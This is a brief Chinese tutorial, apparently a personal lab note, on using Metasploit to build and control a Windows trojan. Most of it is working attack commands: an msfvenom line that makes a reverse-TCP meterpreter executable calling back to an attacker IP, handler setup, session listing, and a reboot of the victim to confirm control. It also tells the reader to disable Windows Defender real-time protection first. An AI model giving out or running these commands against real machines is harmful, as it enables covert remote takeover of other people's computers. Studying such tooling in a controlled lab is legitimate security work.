环境
- windows10
- Mac终端
准备
关闭windows10的防火墙,特别是实时防护这一项,不然无法成功,win7没做测试应该可以直接成功
通过metasploit生成木马并控制需要用到以下几个命令:
-
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.4 lport=4444 -f exe -o /Users/xingwangmingzhe/Downloads/shell.exe
这个命令生成木马。这里使用了一个windows/meterpreter/reverse_tcp的模块 -
use exploit/multi/handler
这个模块支持的target比较多很常见万能,用来监听木马的连接与否 -
show options
用来查看这个模块那些选项是必填项,带有yes的是必填的 -
set PAYLOAD windows/meterpreter/reverse_tcp
和上面的payload保持一致,有的教程没有说这一项,不过我用了测试通过。 -
set LHOST 192.168.1.4
192.168.1.4换成你自己的ip地址 -
exploit -j
后台攻击获取session,也可以直接exploit不带参数(或者run也行) -
sessions
查看有哪些机器打开了木马成功获取到session -
sessions -I ID
sessions -i 1这里的1就是sessions查看到的ID,然后就进入到了meterpreter模块,这是一个后渗透模块,可以打开连接session的反弹shell -
reboot
输入重启命令测试是否控制到机器,成功重启。